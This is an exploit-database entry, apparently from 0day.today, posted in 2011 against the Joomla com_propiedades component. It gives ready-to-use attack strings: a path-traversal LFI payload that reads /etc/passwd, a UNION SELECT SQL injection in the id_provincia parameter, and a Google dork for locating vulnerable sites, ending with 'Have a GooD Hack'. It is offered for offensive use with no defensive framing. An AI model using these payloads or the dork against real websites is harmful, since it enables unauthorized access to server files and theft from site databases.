Joomla com_propiedades Multiple Vulnerabilities

2011-06-23T00:00:00
ID 1337DAY-ID-16389
Type zdt
Reporter z0mbyak
Modified 2011-06-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Joomla com_com_propiedades Multiple Vulnerabilities
# Date: 23.06.2011
# Author: z0mbyak
# Vendor or Software Link: find by yourself
# Version: Don't know
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_
propiedades"
# Tested on: FreeBSD

LFI Vulnerability:

exploit: ../../../../../../../../../../../../etc/passwd%00
VulnSite: vulnsite.name/index.php?option=com_propiedades&controller=../../../../../../../../../../../../etc/passwd%00

SQL-Inj Vulnerability:

exploit: null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0
VulnSite:  vulnsite.name/index.php?option=com_propiedades&task=search&id_provincia=null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0

P.S. The search function is made on Ajax, so you can also use a POST
request to identify vulnerabilities.

P.S.S Have a GooD Hack, and Greets From RUSSIA.



#  0day.today [2018-03-28]  #